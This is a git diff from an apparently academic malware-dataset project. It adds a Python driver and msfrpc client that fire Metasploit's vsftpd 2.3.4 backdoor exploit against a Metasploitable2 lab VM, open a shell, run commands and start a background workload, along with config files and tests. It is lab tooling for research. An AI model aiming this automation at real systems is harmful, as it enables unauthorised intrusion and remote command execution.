diff --git a/README.md b/README.md index def8588..b5fd503 100644 --- a/README.md +++ b/README.md @@ -73,9 +73,16 @@ above produces from real KVM behaviour. |---|---|---| | 1 — real VM, idle | confidence the collector reads real KVM behaviour | ✅ done | | 2 — real VM, real workload from inside the guest | first real-load envelope shape | ✅ done | -| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🚧 | +| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🟡 driver landed, integration pending | | 4 — real VM, real malware sample (XMRig from MalwareBazaar) | the full envelope we ultimately train on | 🚧 | +The Tier-3 driver lives in [`exploits/`](exploits/README.md) — a tiny +msgpack-over-HTTPS msfrpc client plus an `MSFExploitDriver` plugged +into the orchestrator as the `on_phase` callback. First canned module: +`exploits/modules/vsftpd_234_backdoor.toml` (Metasploitable2's +CVE-2011-2523). End-to-end integration needs `msfrpcd` running and a +Metasploitable2 image at `vm/images/`, which is the next bring-up step. + For an interactive view of any episode (zoom/pan/hover), run: ```sh @@ -93,8 +100,8 @@ tools/show_envelope.sh data/episodes/ - ✅ Synthetic envelope demo — full 8-phase envelope produced end-to-end - ✅ Real VM (Alpine 3.21 cloud-init under KVM) — orchestrator collects against the real `qemu-system` pid - ✅ **Tier 2 — real VM, real workload:** serial-console-driven load controller fires `yes`/`dd` inside the guest at every phase transition +- 🟡 **Tier 3 — exploit driver:** `MSFExploitDriver` + msfrpc client + first module config landed (`exploits/`); end-to-end run against a live `msfrpcd` + Metasploitable2 image still pending. 
- 🚧 QMP collector (source 2), bridge pcap collector (source 4), in-guest agent (source 5) -- 🚧 Exploit driver (Metasploit RPC) for `armed → infecting` transitions on `session_open` - 🚧 Shipper (the third leg of the WG pipeline — receiver and orchestrator already verified) > **Topology note:** in this project the **Pi5 is the WireGuard-side @@ -182,7 +189,7 @@ late-boot disk write. That's a real KVM guest you're seeing. | `receiver/` | Starlette app: PUT /v1/episodes ingest, sha256-verified, idempotent | | `vm/` | qcow2 images, launch scripts, snapshot recipes (binaries gitignored) | | `tools/` | Demo runners, load mimic, plot scripts | -| `exploits/` | Metasploit resource scripts for repeatable exploitation (TODO) | +| [`exploits/`](exploits/README.md) | MSF RPC client + driver + per-module TOML configs (Tier 3) | | `samples/` | Sample manifest (sha256-pinned). **Binaries never committed.** | | `training/` | Model training code (deferred — schema first) | | `etc/` | systemd units and config templates installed by the deploy scripts | diff --git a/docs/sources.md b/docs/sources.md index e6b6303..2f8e30d 100644 --- a/docs/sources.md +++ b/docs/sources.md @@ -171,6 +171,10 @@ thing plays in our pipeline. - **pycdlib** — pure-Python ISO9660/Joliet/Rock Ridge builder. Used to produce the NoCloud cidata ISO without depending on system mkisofs/ xorriso. https://clalancette.github.io/pycdlib/ +- **msgpack** — binary serialization used by Metasploit's RPC API. The + Tier-3 driver speaks msfrpcd's native msgpack-over-HTTPS so we don't + pull in a higher-level Metasploit Python client. + https://msgpack.org --- diff --git a/exploits/README.md b/exploits/README.md index 0d433e8..6a37acb 100644 --- a/exploits/README.md +++ b/exploits/README.md @@ -1,12 +1,92 @@ # exploits/ -Metasploit resource scripts (`*.rc`) that drive specific exploit modules -deterministically — same inputs, same module options, every time. 
+The Tier-3 exploit driver — fires a Metasploit module against a +vulnerable target VM, watches for the resulting session, and stamps the +session-open transition into the episode's `events.jsonl` so the +labeler can mark `armed → infecting` honestly. -Each script: -- Sets `RHOSTS` to the guest's bridge IP. -- Sets a payload that opens a session usable for sample upload + execute. -- Avoids any options that introduce randomness in the exploit fire timing - (so that the `armed → infecting` transition lands at a predictable offset). +## Layout -These scripts pair with public Metasploit modules. We do not author exploits. +``` +exploits/ + msfrpc.py tiny msgpack-over-HTTPS client for msfrpcd + driver.py MSFExploitDriver — plugged in as EpisodeRunner.on_phase + modules.py ModuleConfig + TOML loader + modules/ + vsftpd_234_backdoor.toml first canned module (Metasploitable2) + ... +``` + +## Module configs + +Each `modules/*.toml` describes one Metasploit module — its path, the +options to set, and the payload to use. The driver reads these files +to drive `module.execute` over msfrpc. + +```toml +description = "..." +[module] +type = "exploit" # exploit | auxiliary | post +path = "unix/ftp/vsftpd_234_backdoor" + +[module.options] +RHOSTS = "{{ target_ip }}" # placeholder substituted at runtime +RPORT = 21 + +[payload] +path = "cmd/unix/interact" +[payload.options] # optional +# LHOST = "{{ target_ip }}" + +[session] +type = "shell" +``` + +The only placeholder supported today is `{{ target_ip }}`. Add more in +`exploits/modules.py::ModuleConfig.render_options` when needed. + +## Running + +```sh +# 1. Start msfrpcd locally: +msfrpcd -P -U msf -a 127.0.0.1 -p 55553 + +# 2. Drop a vulnerable target image at vm/images/.qcow2 (e.g. +# Metasploitable2 — see docs/sources.md for sha256). + +# 3. 
Drive an episode: +MSFRPC_PASSWORD= uv run python tools/run_tier3_demo.py \ + --module vsftpd_234_backdoor \ + --target-port 21 \ + --data-root data +``` + +The episode's `events.jsonl` will contain: + +``` +driver_setup — module + target snapshotted before fire +exploit_fire — module.execute issued +session_open — new session id observed in session.list +session_landing_probe — first command response (id) recorded +sample_executed — workload kicked off inside the session +session_dormant — workload killed +session_killed — session.stop at episode end +``` + +These pair with the standard phase labels in `labels.jsonl` so a +downstream loader can reconcile "what the orchestrator scheduled" +against "what actually happened on the wire". + +## Adding a module + +1. Drop a TOML at `exploits/modules/.toml` per the schema above. +2. Pick a payload that works without a callback channel until the + `br-malware` bridge is in (see `vm/launch_target.sh` — SLIRP + + `restrict=on` blocks reverse-tcp by design). `cmd/unix/interact` + and other "session on the same socket" payloads are safe. +3. Drive a quick check: `uv run python tools/run_tier3_demo.py --module `. +4. The new module is automatically picked up by `tools/run_tier3_demo.py` + via `--module `; no driver code changes needed. + +We do **not** author exploits or modify upstream Metasploit code. The +driver is a pure adapter from the project's phase machine to msfrpc. diff --git a/exploits/__init__.py b/exploits/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/exploits/driver.py b/exploits/driver.py new file mode 100644 index 0000000..846057a --- /dev/null +++ b/exploits/driver.py @@ -0,0 +1,205 @@ +"""Tier-3 exploit driver. + +Plugged into ``EpisodeRunner`` as the ``on_phase`` callback. Translates +the closed phase enum into msfrpc actions: + + clean — idle. (no-op; exploit hasn't fired yet) + armed — module loaded + options applied; module fires + with ``module.execute``. 
Driver records the fire + timestamp via ``emit_event`` so the labeler can + align ``armed`` with what's actually happening. + infecting — poll for a new session; on session_open, run a + one-shot landing command (``id`` or similar) so + we have a clear "session is responsive" event. + infected_running — start observable workload inside the session. + dormant — kill the workload, leave the session alive. + reverting — kill session, snapshot revert handled by caller. + +The events the driver writes match the schema in ``docs/data-model.md``: +``exploit_fire``, ``session_open``, ``sample_executed``, ``session_dormant``, +``session_killed``. + +The driver does NOT author exploits or pick payloads at runtime — those +choices live in ``exploits/modules/*.toml``. The driver is a pure +adapter between the phase machine and msfrpc. +""" + +from __future__ import annotations + +import logging +import time +from dataclasses import dataclass +from typing import Callable + +from .modules import ModuleConfig +from .msfrpc import MSFRpcClient, wait_for_new_session + + +log = logging.getLogger("cis490.exploits.driver") + +EmitEvent = Callable[..., None] + + +@dataclass +class DriverConfig: + target_ip: str + session_open_timeout_s: float = 30.0 + # Workload command used to mimic XMRig-class infected_running shape + # in a real session. Kept simple on purpose — anything observable + # from outside the guest works for the dataset; we'll drop in a + # real sample at Tier 4. + workload_cmd: str = "yes > /dev/null" + # How we kill the workload at dormant time. + workload_kill_cmd: str = "pkill yes; true" + + +class MSFExploitDriver: + """Phase-to-msfrpc adapter. 
One instance per episode.""" + + def __init__( + self, + client: MSFRpcClient, + module: ModuleConfig, + cfg: DriverConfig, + emit_event: EmitEvent, + ) -> None: + self.client = client + self.module = module + self.cfg = cfg + self.emit = emit_event + + self._sessions_seen_at_arm: set[int] = set() + self._session_id: int | None = None + self._job_id: int | str | None = None + self._fired = False + + # ---- lifecycle ------------------------------------------------------ + + def setup(self) -> None: + """Authenticate and snapshot the pre-existing session set so we + can recognize a *new* session as the one we just opened.""" + self.client.login() + self._sessions_seen_at_arm = set(self.client.session_list().keys()) + self.emit( + "driver_setup", + module=self.module.module_path, + payload=self.module.payload_path, + target_ip=self.cfg.target_ip, + preexisting_sessions=sorted(self._sessions_seen_at_arm), + ) + + def teardown(self) -> None: + if self._session_id is not None: + try: + self.client.session_stop(self._session_id) + self.emit("session_killed", session_id=self._session_id) + except Exception: + log.exception("session.stop on %s", self._session_id) + if self._job_id is not None: + try: + self.client.job_stop(self._job_id) + except Exception: + log.debug("job.stop on %s (often already gone)", self._job_id) + self.client.logout() + + # ---- phase callback ------------------------------------------------- + + def set_phase(self, phase: str) -> None: + log.info("driver phase -> %s", phase) + if phase == "clean": + return + if phase == "armed": + self._fire() + elif phase == "infecting": + self._await_session() + elif phase == "infected_running": + self._start_workload() + elif phase == "dormant": + self._stop_workload() + elif phase == "reverting": + self.teardown() + else: + log.warning("unknown phase: %s", phase) + + # ---- actions -------------------------------------------------------- + + def _fire(self) -> None: + if self._fired: + log.debug("module 
already fired; skipping re-fire") + return + opts = self.module.render_options(target_ip=self.cfg.target_ip) + self.emit( + "exploit_fire", + module=self.module.module_path, + options={k: v for k, v in opts.items() if k != "PASSWORD"}, + ) + resp = self.client.module_execute( + self.module.module_type, self.module.module_path, opts, + ) + self._job_id = resp.get("job_id") + self._fired = True + + def _await_session(self) -> None: + if self._session_id is not None: + return + result = wait_for_new_session( + self.client, + seen=self._sessions_seen_at_arm, + timeout_s=self.cfg.session_open_timeout_s, + ) + if result is None: + self.emit( + "session_open_timeout", + module=self.module.module_path, + timeout_s=self.cfg.session_open_timeout_s, + ) + log.warning( + "no session opened within %.1fs", self.cfg.session_open_timeout_s, + ) + return + sid, info = result + self._session_id = sid + self.emit( + "session_open", + session_id=sid, + session_type=info.get("type"), + tunnel_peer=info.get("tunnel_peer"), + ) + # Landing probe so we have a known-good RTT marker on the wire. 
+ try: + self.client.session_shell_write(sid, "id") + time.sleep(0.5) + out = self.client.session_shell_read(sid) + self.emit("session_landing_probe", session_id=sid, output=out.strip()[:256]) + except Exception: + log.exception("landing probe on session %s", sid) + + def _start_workload(self) -> None: + if self._session_id is None: + log.warning("infected_running with no session; skipping workload") + return + self.client.session_shell_write( + self._session_id, + f"nohup sh -c {_shquote(self.cfg.workload_cmd)} > /dev/null 2>&1 < /dev/null & disown", + ) + self.emit( + "sample_executed", + session_id=self._session_id, + command=self.cfg.workload_cmd, + ) + + def _stop_workload(self) -> None: + if self._session_id is None: + return + self.client.session_shell_write( + self._session_id, self.cfg.workload_kill_cmd, + ) + self.emit("session_dormant", session_id=self._session_id) + + +def _shquote(s: str) -> str: + # Minimal POSIX single-quote escaping. The workload command is set + # by us, not by anything user-controlled, so we just need to handle + # embedded single quotes correctly for completeness. + return "'" + s.replace("'", "'\\''") + "'" diff --git a/exploits/modules.py b/exploits/modules.py new file mode 100644 index 0000000..c3db923 --- /dev/null +++ b/exploits/modules.py @@ -0,0 +1,97 @@ +"""TOML loader for exploit-module configs. + +Each ``exploits/modules/*.toml`` describes one Metasploit module: its +path, the options to set, the payload to use, and how the driver +should treat the resulting session. The driver consumes ``ModuleConfig`` +objects; the TOML files are the on-disk source of truth. + +Why TOML and not msfconsole ``.rc`` scripts? ``.rc`` scripts are +imperative and assume an interactive console; the driver needs the +*structured* options to push them through msfrpc. TOML is the simplest +way to express a small typed map of options, and it round-trips +cleanly into ``meta.json`` for episode reproducibility. 
+""" + +from __future__ import annotations + +import tomllib +from dataclasses import dataclass, field +from pathlib import Path +from typing import Any + + +_VALID_MODULE_TYPES = {"exploit", "auxiliary", "post"} + + +@dataclass(frozen=True) +class ModuleConfig: + name: str # short id, e.g. "vsftpd_234_backdoor" + module_type: str # "exploit" | "auxiliary" | "post" + module_path: str # e.g. "unix/ftp/vsftpd_234_backdoor" + options: dict[str, Any] = field(default_factory=dict) + payload_path: str | None = None # e.g. "cmd/unix/interact" + payload_options: dict[str, Any] = field(default_factory=dict) + expected_session_type: str = "shell" # what we'll get on success + description: str = "" + + def render_options(self, *, target_ip: str) -> dict[str, Any]: + """Substitute ``{{ target_ip }}`` placeholders in options. + + Module configs use Jinja-style placeholders for any value that + isn't known until episode time (RHOSTS, LHOST, etc.). Today the + only supported placeholder is ``target_ip``; if more are needed + later, generalize here.""" + out: dict[str, Any] = {} + for k, v in self.options.items(): + if isinstance(v, str) and "{{" in v: + out[k] = ( + v.replace("{{ target_ip }}", target_ip) + .replace("{{target_ip}}", target_ip) + ) + else: + out[k] = v + # MSF requires PAYLOAD as a top-level option even though we + # carry it in a separate field on the config. 
+ if self.payload_path: + out["PAYLOAD"] = self.payload_path + for k, v in self.payload_options.items(): + if isinstance(v, str) and "{{" in v: + v = ( + v.replace("{{ target_ip }}", target_ip) + .replace("{{target_ip}}", target_ip) + ) + out[k] = v + return out + + +def load_module_config(path: Path) -> ModuleConfig: + raw = tomllib.loads(path.read_text()) + mod = raw.get("module") or {} + module_path = mod.get("path") + module_type = mod.get("type", "exploit") + if not isinstance(module_path, str) or not module_path: + raise ValueError(f"{path}: module.path must be a non-empty string") + if module_type not in _VALID_MODULE_TYPES: + raise ValueError( + f"{path}: module.type {module_type!r} not in {_VALID_MODULE_TYPES}" + ) + options = (raw.get("module", {}).get("options") or {}) | (raw.get("options") or {}) + payload = raw.get("payload") or {} + return ModuleConfig( + name=path.stem, + module_type=module_type, + module_path=module_path, + options=dict(options), + payload_path=payload.get("path"), + payload_options=dict(payload.get("options") or {}), + expected_session_type=raw.get("session", {}).get("type", "shell"), + description=raw.get("description", ""), + ) + + +def load_module_configs(directory: Path) -> dict[str, ModuleConfig]: + """Load every ``*.toml`` under ``directory``, keyed by short name.""" + return { + p.stem: load_module_config(p) + for p in sorted(directory.glob("*.toml")) + } diff --git a/exploits/modules/vsftpd_234_backdoor.toml b/exploits/modules/vsftpd_234_backdoor.toml new file mode 100644 index 0000000..4e7374f --- /dev/null +++ b/exploits/modules/vsftpd_234_backdoor.toml @@ -0,0 +1,23 @@ +description = """ +vsftpd 2.3.4 intentional backdoor (CVE-2011-2523). Triggered by an FTP +USER name ending with ':)'. Standard Metasploitable2 exploit, fully +deterministic — perfect for a Tier-3 first-light run because the +exploit fire timing is bounded by a single FTP round-trip. 
+""" + +[module] +type = "exploit" +path = "unix/ftp/vsftpd_234_backdoor" + +[module.options] +RHOSTS = "{{ target_ip }}" +RPORT = 21 +# The exploit returns its own command shell — we drive it with a +# minimal cmd/unix/interact payload so the session lands as a plain +# shell session usable by session.shell_write/read. + +[payload] +path = "cmd/unix/interact" + +[session] +type = "shell" diff --git a/exploits/msfrpc.py b/exploits/msfrpc.py new file mode 100644 index 0000000..f39ca49 --- /dev/null +++ b/exploits/msfrpc.py @@ -0,0 +1,231 @@ +"""Tiny Metasploit RPC client — just enough for the Tier-3 driver. + +We talk msgpack over HTTPS to ``msfrpcd``. The full MSF RPC surface is +huge; this client implements only the verbs we actually call: + + auth.login — get a token + auth.logout — release the token + module.execute — fire an exploit (or aux) module by name + job.list / job.stop — manage the running module + session.list — see opened sessions, find the one we just opened + session.shell_write/read — run commands in a shell session + session.stop — kill a session at episode end + +Why not pull in pymetasploit3? Two reasons: + - msfrpcd's protocol is small enough that owning it removes a third-party + dep (and a maintenance risk on a course project). + - the parts we need (session opening, shell commands, job lifecycle) + are simple, and we want full visibility into what's on the wire when + debugging an exploit fire. + +The client is intentionally synchronous; the Tier-3 driver runs in the +orchestrator's main thread alongside the collector, and a session-open +poll of a few hundred milliseconds is well within budget. 
+""" + +from __future__ import annotations + +import http.client +import logging +import socket +import ssl +import time +from dataclasses import dataclass +from typing import Any + +try: + import msgpack # type: ignore[import-untyped] +except ImportError as e: # pragma: no cover - import-time guard + raise ImportError( + "the msgpack package is required for the MSF RPC client. " + "install it with: pip install msgpack" + ) from e + + +log = logging.getLogger("cis490.msfrpc") + + +class MSFRpcError(RuntimeError): + """Raised when msfrpcd returns an error or a malformed response.""" + + +@dataclass +class MSFRpcConfig: + host: str = "127.0.0.1" + port: int = 55553 + user: str = "msf" + password: str = "" + ssl: bool = True + timeout_s: float = 30.0 + # msfrpcd's default cert is self-signed — most callers will run + # against localhost where this is the right tradeoff. Override + # explicitly for any non-loopback host. + verify: bool = False + + +class MSFRpcClient: + """Synchronous msfrpcd client. Token is acquired on ``login()`` and + re-used on every subsequent call. 
Not thread-safe; the driver owns + one client per episode.""" + + def __init__(self, cfg: MSFRpcConfig) -> None: + self.cfg = cfg + self._token: str | None = None + + # ---- session management -------------------------------------------- + + def login(self) -> None: + resp = self._call_no_auth("auth.login", self.cfg.user, self.cfg.password) + if resp.get("result") != "success" or "token" not in resp: + raise MSFRpcError(f"auth.login failed: {resp!r}") + self._token = resp["token"] + log.info("msfrpc auth.login ok (token=%s...)", self._token[:8]) + + def logout(self) -> None: + if self._token is None: + return + try: + self._call("auth.logout", self._token) + except MSFRpcError as e: + log.warning("msfrpc auth.logout: %s", e) + finally: + self._token = None + + # ---- modules -------------------------------------------------------- + + def module_execute( + self, + module_type: str, + module_name: str, + options: dict[str, Any], + ) -> dict[str, Any]: + """Fire a module. Returns ``{"job_id": int, "uuid": str}``.""" + resp = self._call("module.execute", module_type, module_name, options) + if "job_id" not in resp: + raise MSFRpcError(f"module.execute returned no job_id: {resp!r}") + log.info( + "module.execute %s/%s -> job_id=%s uuid=%s", + module_type, module_name, resp["job_id"], resp.get("uuid"), + ) + return resp + + # ---- jobs ----------------------------------------------------------- + + def job_list(self) -> dict[str, str]: + return self._call("job.list") + + def job_stop(self, job_id: int | str) -> dict[str, Any]: + # msfrpcd accepts the id as a string. + return self._call("job.stop", str(job_id)) + + # ---- sessions ------------------------------------------------------- + + def session_list(self) -> dict[int, dict[str, Any]]: + raw = self._call("session.list") + # msfrpcd keys session ids as ints in msgpack but some versions + # round-trip them as strings. Normalize. 
+ out: dict[int, dict[str, Any]] = {} + for k, v in (raw or {}).items(): + try: + out[int(k)] = v + except (TypeError, ValueError): + pass + return out + + def session_shell_write(self, session_id: int, data: str) -> dict[str, Any]: + if not data.endswith("\n"): + data = data + "\n" + return self._call("session.shell_write", session_id, data) + + def session_shell_read(self, session_id: int) -> str: + resp = self._call("session.shell_read", session_id) + return resp.get("data", "") if isinstance(resp, dict) else "" + + def session_stop(self, session_id: int) -> dict[str, Any]: + return self._call("session.stop", session_id) + + # ---- transport ------------------------------------------------------ + + def _call(self, method: str, *args: Any) -> dict[str, Any]: + if self._token is None: + raise MSFRpcError("not authenticated; call login() first") + return self._raw_call([method, self._token, *args]) + + def _call_no_auth(self, method: str, *args: Any) -> dict[str, Any]: + return self._raw_call([method, *args]) + + def _raw_call(self, payload: list[Any]) -> dict[str, Any]: + body = msgpack.packb(payload, use_bin_type=False) + conn = self._open_conn() + try: + conn.request( + "POST", + "/api/", + body=body, + headers={ + "Content-Type": "binary/message-pack", + "Content-Length": str(len(body)), + "Connection": "close", + }, + ) + r = conn.getresponse() + raw = r.read() + if r.status != 200: + raise MSFRpcError( + f"msfrpcd HTTP {r.status} for {payload[0]!r}: {raw[:200]!r}" + ) + except (socket.error, http.client.HTTPException) as e: + raise MSFRpcError(f"transport error calling {payload[0]!r}: {e}") from e + finally: + conn.close() + + try: + decoded = msgpack.unpackb(raw, raw=False) + except Exception as e: + raise MSFRpcError(f"could not decode msfrpcd response: {e}") from e + + if isinstance(decoded, dict) and decoded.get("error") is True: + raise MSFRpcError( + f"{payload[0]!r}: {decoded.get('error_class')} " + f"{decoded.get('error_message')}" + ) + if not 
isinstance(decoded, dict): + # session.list and friends can legitimately return {} or a dict, + # but never a non-dict — anything else is a protocol violation. + raise MSFRpcError( + f"unexpected response type for {payload[0]!r}: {type(decoded).__name__}" + ) + return decoded + + def _open_conn(self) -> http.client.HTTPConnection: + if self.cfg.ssl: + ctx = ssl.create_default_context() + if not self.cfg.verify: + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + return http.client.HTTPSConnection( + self.cfg.host, self.cfg.port, + timeout=self.cfg.timeout_s, context=ctx, + ) + return http.client.HTTPConnection( + self.cfg.host, self.cfg.port, timeout=self.cfg.timeout_s, + ) + + +def wait_for_new_session( + client: MSFRpcClient, + *, + seen: set[int], + timeout_s: float, + poll_s: float = 0.25, +) -> tuple[int, dict[str, Any]] | None: + """Poll ``session.list`` until a session id we haven't seen before + appears, or until timeout. Returns ``(session_id, info)`` or None.""" + deadline = time.monotonic() + timeout_s + while time.monotonic() < deadline: + sessions = client.session_list() + for sid, info in sessions.items(): + if sid not in seen: + return sid, info + time.sleep(poll_s) + return None diff --git a/orchestrator/episode.py b/orchestrator/episode.py index 3735f91..72bc867 100644 --- a/orchestrator/episode.py +++ b/orchestrator/episode.py @@ -83,20 +83,24 @@ class EpisodeRunner: self.on_phase = on_phase self.episode_id = cfg.episode_id or new_ulid() self.episode_dir: Path = cfg.data_root / "episodes" / self.episode_id + # Create the dir up front so external drivers can call + # emit_event() between construction and run() — e.g. an exploit + # driver that writes a driver_setup event before the schedule + # walks. The dir is otherwise empty until run() opens files. 
+ self.episode_dir.mkdir(parents=True, exist_ok=True) self._t_mono_origin_ns: int = 0 self._stop = threading.Event() # ---- public --------------------------------------------------------- def run(self) -> EpisodeResult: - self.episode_dir.mkdir(parents=True, exist_ok=True) self._t_mono_origin_ns = time.monotonic_ns() started_at_wall = datetime.now(timezone.utc).isoformat() meta = self._initial_meta(started_at_wall) self._write_meta(meta) - self._emit_event(0, "snapshot_load", snapshot=self.cfg.snapshot_name) + self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name) rows_holder: dict[str, int] = {"rows": 0} @@ -124,13 +128,9 @@ class EpisodeRunner: self._stop.set() t.join(timeout=2.0) - end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns pid_alive = _pid_alive(self.cfg.target_pid) - self._emit_event( - end_mono_ns, - "episode_end", - target_pid_alive=pid_alive, - ) + self.emit_event("episode_end", target_pid_alive=pid_alive) + end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat() meta["result"] = { @@ -171,9 +171,7 @@ class EpisodeRunner: break t_mono = time.monotonic_ns() - self._t_mono_origin_ns self._emit_label(t_mono, phase, prev=prev, reason="scheduled") - self._emit_event( - t_mono, "phase_transition", to=phase, prev=prev - ) + self.emit_event("phase_transition", to=phase, prev=prev) if self.on_phase is not None: try: self.on_phase(phase) @@ -220,7 +218,15 @@ class EpisodeRunner: f.write("\n") os.replace(tmp, path) - def _emit_event(self, t_mono_ns: int, event: str, **extra) -> None: + def emit_event(self, event: str, **extra) -> None: + """Append a row to events.jsonl. Public so external drivers + (e.g. 
the MSF exploit driver) can stamp their own events with + the same monotonic clock the orchestrator is using.""" + t_mono_ns = ( + time.monotonic_ns() - self._t_mono_origin_ns + if self._t_mono_origin_ns + else 0 + ) row = { "t_mono_ns": t_mono_ns, "t_wall_ns": time.time_ns(), diff --git a/pyproject.toml b/pyproject.toml index ded5c12..9c1d0d9 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -6,6 +6,7 @@ requires-python = ">=3.11" dependencies = [ "starlette>=0.36", "uvicorn[standard]>=0.27", + "msgpack>=1.0", # MSF RPC wire format for the Tier-3 exploit driver ] [dependency-groups] diff --git a/tests/test_exploits.py b/tests/test_exploits.py new file mode 100644 index 0000000..17422cd --- /dev/null +++ b/tests/test_exploits.py @@ -0,0 +1,318 @@ +"""Tests for the Tier-3 exploit driver and its module loader. + +The msfrpc transport itself is exercised against a fake client so the +suite runs in-process. A live-msfrpcd integration test is out of +scope here — the wire format is small and the high-value coverage is +the phase-to-action mapping plus the events the driver emits. 
+""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Any + +import pytest + +from exploits.driver import DriverConfig, MSFExploitDriver +from exploits.modules import ModuleConfig, load_module_config + + +REPO_ROOT = Path(__file__).resolve().parent.parent +MODULES_DIR = REPO_ROOT / "exploits" / "modules" + + +# ----------------------------------------------------------------------- +# Module config loader +# ----------------------------------------------------------------------- + +def test_load_vsftpd_module_config_round_trip() -> None: + cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml") + assert cfg.name == "vsftpd_234_backdoor" + assert cfg.module_type == "exploit" + assert cfg.module_path == "unix/ftp/vsftpd_234_backdoor" + assert cfg.options["RPORT"] == 21 + assert cfg.options["RHOSTS"] == "{{ target_ip }}" + assert cfg.payload_path == "cmd/unix/interact" + + +def test_render_options_substitutes_target_ip() -> None: + cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml") + rendered = cfg.render_options(target_ip="10.200.0.10") + assert rendered["RHOSTS"] == "10.200.0.10" + assert rendered["RPORT"] == 21 + assert rendered["PAYLOAD"] == "cmd/unix/interact" + + +def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None: + p = tmp_path / "x.toml" + p.write_text( + '[module]\n' + 'type = "exploit"\n' + 'path = "unix/ftp/example"\n' + '[module.options]\n' + 'RHOSTS = "{{target_ip}}"\n' + 'LHOST = "{{ target_ip }}"\n' + ) + cfg = load_module_config(p) + rendered = cfg.render_options(target_ip="10.0.0.5") + assert rendered["RHOSTS"] == "10.0.0.5" + assert rendered["LHOST"] == "10.0.0.5" + + +def test_load_rejects_missing_module_path(tmp_path: Path) -> None: + p = tmp_path / "bad.toml" + p.write_text('[module]\ntype = "exploit"\n') + with pytest.raises(ValueError, match="module.path"): + load_module_config(p) + + +def test_load_rejects_unknown_module_type(tmp_path: Path) -> 
None: + p = tmp_path / "bad.toml" + p.write_text( + '[module]\ntype = "evil"\npath = "unix/ftp/x"\n' + ) + with pytest.raises(ValueError, match="module.type"): + load_module_config(p) + + +# ----------------------------------------------------------------------- +# Exploit driver — phase transitions against a fake MSFRpcClient +# ----------------------------------------------------------------------- + +class FakeMSFRpcClient: + """Stand-in that records every method called and lets a test + script the apparent state of msfrpcd (sessions, return values).""" + + def __init__(self, *, sessions_after_fire: dict[int, dict[str, Any]] | None = None) -> None: + self.calls: list[tuple[str, tuple, dict]] = [] + self.logged_in = False + self._fired = False + self._sessions: dict[int, dict[str, Any]] = {} + self._sessions_after_fire = sessions_after_fire or {} + self.shell_writes: list[tuple[int, str]] = [] + + def _record(self, name: str, *args, **kwargs) -> None: + self.calls.append((name, args, kwargs)) + + def login(self) -> None: + self._record("login") + self.logged_in = True + + def logout(self) -> None: + self._record("logout") + self.logged_in = False + + def session_list(self) -> dict[int, dict[str, Any]]: + self._record("session_list") + return dict(self._sessions) + + def module_execute(self, mtype: str, mname: str, opts: dict) -> dict: + self._record("module_execute", mtype, mname, opts) + self._fired = True + # Simulate sessions appearing after the exploit fires. 
+ self._sessions = dict(self._sessions_after_fire) + return {"job_id": 7, "uuid": "fake-uuid"} + + def job_stop(self, job_id) -> dict: + self._record("job_stop", job_id) + return {"result": "success"} + + def session_shell_write(self, sid: int, data: str) -> dict: + self._record("session_shell_write", sid, data) + if not data.endswith("\n"): + data = data + "\n" + self.shell_writes.append((sid, data)) + return {"write_count": str(len(data))} + + def session_shell_read(self, sid: int) -> str: + self._record("session_shell_read", sid) + return "uid=0(root) gid=0(root)\n" + + def session_stop(self, sid: int) -> dict: + self._record("session_stop", sid) + self._sessions.pop(sid, None) + return {"result": "success"} + + +def _make_driver( + sessions_after_fire: dict[int, dict[str, Any]] | None = None, + target_ip: str = "10.200.0.10", +) -> tuple[MSFExploitDriver, FakeMSFRpcClient, list[tuple[str, dict]]]: + cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml") + client = FakeMSFRpcClient(sessions_after_fire=sessions_after_fire) + events: list[tuple[str, dict]] = [] + + def emit(event: str, **extra: Any) -> None: + events.append((event, extra)) + + driver = MSFExploitDriver( + client=client, # type: ignore[arg-type] + module=cfg, + cfg=DriverConfig( + target_ip=target_ip, + session_open_timeout_s=0.5, # tests must not block + ), + emit_event=emit, + ) + return driver, client, events + + +def test_driver_setup_authenticates_and_snapshots_sessions() -> None: + driver, client, events = _make_driver() + client._sessions = {99: {"type": "shell"}} # pre-existing session + driver.setup() + assert client.logged_in is True + assert driver._sessions_seen_at_arm == {99} + assert events[0][0] == "driver_setup" + assert events[0][1]["module"] == "unix/ftp/vsftpd_234_backdoor" + assert events[0][1]["target_ip"] == "10.200.0.10" + + +def test_full_phase_walk_emits_expected_event_order() -> None: + driver, client, events = _make_driver( + sessions_after_fire={1: {"type": 
"shell", "tunnel_peer": "10.200.0.10:21"}}, + ) + driver.setup() + for phase in [ + "clean", "armed", "infecting", + "infected_running", "dormant", + "infected_running", "dormant", + "clean", + ]: + driver.set_phase(phase) + driver.teardown() + + names = [e[0] for e in events] + # Order matters: fire comes before session_open, which comes before + # workload, which comes before kill+logout. + assert names.index("exploit_fire") < names.index("session_open") + assert names.index("session_open") < names.index("session_landing_probe") + assert names.index("session_landing_probe") < names.index("sample_executed") + assert names.count("sample_executed") == 2 # two infected_running phases + assert names.count("session_dormant") == 2 + assert "session_killed" in names + + # Driver should have asked the FakeClient to fire exactly once. + fire_calls = [c for c in client.calls if c[0] == "module_execute"] + assert len(fire_calls) == 1 + _, args, _ = fire_calls[0] + assert args[1] == "unix/ftp/vsftpd_234_backdoor" + assert args[2]["RHOSTS"] == "10.200.0.10" + assert args[2]["PAYLOAD"] == "cmd/unix/interact" + + +def test_session_open_timeout_emits_timeout_event() -> None: + # No sessions ever appear after fire. + driver, client, events = _make_driver(sessions_after_fire={}) + driver.setup() + driver.set_phase("armed") + driver.set_phase("infecting") + names = [e[0] for e in events] + assert "session_open_timeout" in names + assert "session_open" not in names + + +def test_workload_phases_are_no_op_without_session() -> None: + driver, client, events = _make_driver(sessions_after_fire={}) + driver.setup() + driver.set_phase("armed") + driver.set_phase("infecting") # times out, no session + 